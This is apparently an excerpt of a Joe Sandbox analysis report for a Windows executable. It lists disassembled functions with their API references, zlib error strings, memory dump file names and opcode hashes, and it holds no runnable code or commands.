Function 00007FF72B8DACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid literal/length code, xrefs: 00007FF72B8DB3E2
invalid distance code, xrefs: 00007FF72B8DB5B4
invalid distances set, xrefs: 00007FF72B8DB1A0
invalid distance too far back, xrefs: 00007FF72B8DB670
invalid bit length repeat, xrefs: 00007FF72B8DB099
too many length or distance symbols, xrefs: 00007FF72B8DAE46
invalid literal/lengths set, xrefs: 00007FF72B8DB133
invalid code -- missing end-of-block, xrefs: 00007FF72B8DB0C6
invalid code lengths set, xrefs: 00007FF72B8DAE2D

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
Instruction ID: e8c2942a4ac661c04bea922952c4d690d89ff1e7d28a3f3b5b238896598cd6e5
Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
Instruction Fuzzy Hash: 25520672A146A68BD7A49F28C858B7D7BA9FB44340F91413AE65E83790DB3CD850CF90

Function 00007FF72B8DD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF72B8DD148
RtlCaptureContext.KERNEL32 ref: 00007FF72B8DD175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B8DD18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B8DD1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B8DD224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8DD241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8DD24C

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: a49e1acc7307f4e011f80c99f87bf82a1a7874edc28b74e92ede8e976a07aebe
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: A5313272608B8286EB609F64EC403EDB364FB95744F84403ADA4D47BA5EF38D559CB50

Function 00007FF72B8F5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B8F5C45

Part of subcall function 00007FF72B8F5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F55AC

Part of subcall function 00007FF72B8EA948: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
Part of subcall function 00007FF72B8EA948: GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

Part of subcall function 00007FF72B8EA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72B8EA8DF,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EA909
Part of subcall function 00007FF72B8EA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72B8EA8DF,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EA92E

_get_daylight.LIBCMT ref: 00007FF72B8F5C34

Part of subcall function 00007FF72B8F55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F560C

_get_daylight.LIBCMT ref: 00007FF72B8F5EAA
_get_daylight.LIBCMT ref: 00007FF72B8F5EBB
_get_daylight.LIBCMT ref: 00007FF72B8F5ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B8F610C), ref: 00007FF72B8F5EF3

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID:
API String ID: 1458651798-0
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: a41a443a513cf237e5db5f99203bb9e90ffe6dc6563bb5865a6d40b486e4ef1e
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: 67D1B922E1824286E720BF29DC411F9A7A1FFA4794FC48135DA5D476B6DF3CF4618BA0

Function 00007FF72B8EA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF72B8EA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B8EA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B8EA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B8EA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8EA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8EA72E

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 5897a2cf82172e9817ff2d37f90f6b757583375406e7b88eb4f46ba45d53ff04
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: F2318332618B8286DB20DF68EC402AEB3A4FB95754F900135EA9D43B65DF3CD155CB50

Function 00007FF72B8F1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F18C0
FindFirstFileExW.KERNEL32 ref: 00007FF72B8F19CA

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: 16e79c66066bc8454d6ea0845eb433852d56d47bbf7eb3e92a04c82898808b6f
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 2EB1C821B1869241EA61BB6A9D002B9E350EF64FE4FC45131ED5D07BA5EF3CF491CBA0

Function 00007FF72B8F5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B8F5EAA

Part of subcall function 00007FF72B8F55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F560C

_get_daylight.LIBCMT ref: 00007FF72B8F5EBB

Part of subcall function 00007FF72B8F5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F55AC

_get_daylight.LIBCMT ref: 00007FF72B8F5ECC

Part of subcall function 00007FF72B8F55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F55DC

Part of subcall function 00007FF72B8EA948: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
Part of subcall function 00007FF72B8EA948: GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B8F610C), ref: 00007FF72B8F5EF3

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
String ID:
API String ID: 2248164782-0
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: f8d5340080795d8886664c35d3005fe4f9edbd86a512b5b3541a4503cb3d1a51
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 94518631A1864286E720FF29DC815A9E7A0FB98794FC09135EA4D476B6DF3CF4518FA0

Function 00007FF72B8DD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF72B8DD03C
GetCurrentThreadId.KERNEL32 ref: 00007FF72B8DD04A
GetCurrentProcessId.KERNEL32 ref: 00007FF72B8DD056
QueryPerformanceCounter.KERNEL32 ref: 00007FF72B8DD066

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 9e800adfe1d1d0706395e20c22446a71855d45b450e09d826a93db150e383cc6
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 17114C22B14F068AEB009B64EC442B973A4FB59758F840E31DA6D867A4DF38E1658790

Function 00007FF72B8F3C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF72B8F3C76
memcpy_s.LIBCPMT ref: 00007FF72B8F3CA1

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: b15d9450209c7532fdf988bae4d217494f558a32743748a8821705c08a5fda94
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: BEC1D272B1828687E7249F19A44466AF7A1FBA4B84FC58135DB4E43B94DB3DF811CB80

Function 00007FF72B8DA47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

unknown header flags set, xrefs: 00007FF72B8DA4C5
header crc mismatch, xrefs: 00007FF72B8DA921
, xrefs: 00007FF72B8DA55B

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
Instruction ID: c2871827e7d836ee0bdd5754fe69752ed01083d6971e7284d9241778b2d81966
Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
Instruction Fuzzy Hash: 62F1A772A043C68BE7A5AF28C888B3ABAA9EF44740F954535DB5D473A0CB38D551CF90

Function 00007FF72B8F9728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF72B8F9977
RaiseException.KERNEL32 ref: 00007FF72B8F9988

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: f7b89a65f47f1ceb2bfbc58e85a456536a098acee680d64c97a4ca18955b4bf1
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: D2B16D73A14B898BEB15CF2DC8463687BA0F744B48F958921DB5D837B4CB39E461CB50

Function 00007FF72B8E39A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF72B8E3B12
, xrefs: 00007FF72B8E3D54

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: f05fd2d241a596fdbceb409350643292030ce30562f5046d5a5076283cb11647
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: DDE1BA72A08A8685D766AF5D885013DB360FF45B48F949135EA0E077B4DF2DECA1CB90

Function 00007FF72B8DA2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF72B8DA449
incorrect header check, xrefs: 00007FF72B8DA462

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
Instruction ID: b06713669eec18cb3f60c73a38a599e8843470c8edce103131ac2df64814ab92
Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
Instruction Fuzzy Hash: 0F919A72A182C787E7A49A29C848B3E7AA9FB44350F91413ADB5E467A0DB38D550CF90

Function 00007FF72B8EDEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF72B8EE07A
e+000, xrefs: 00007FF72B8EDFFD

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: f60ca33f549d9206b8d1533c75947aea529cd50e5ef2480e1dd2afa2c6ad00d6
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: A2517723B182C586E725DE799C00769FB91F744B94F888231EBAC4BAE5DE3DE414CB50

Function 00007FF72B8F08C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: 217bc03cd274e899fd7011d37872d7e96957b658a17d47280d60085622a5adb6
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: 0702A321B1D68648FA51BF5D9C00279A680EF61FA0FC54635EDAD463F2DE3CB4218BA0

Function 00007FF72B8EDA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF72B8EDD9E

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 9a3522da7d031c54e5b79aab11c43b20c3745a1467df1241fcaed41ee0af8b9e
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 53A18863B087C987EB21DF69A8007A9BB90EB50BC4F408132EE4D477A1EE3DD419CB50

Function 00007FF72B8E8794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF72B8E87B3

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: 238544c80f730212687c9b7c945a64141f764b9eb221f02b0cbeaa2a0fd2b8ad
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: 3751B101F1869241FA64B6AE5D0117ED290EF44BD4FC84434EE5E477B6EE3CF4618AA0

Function 00007FF72B8F3480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF72B8F3484

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: HeapProcess
String ID:
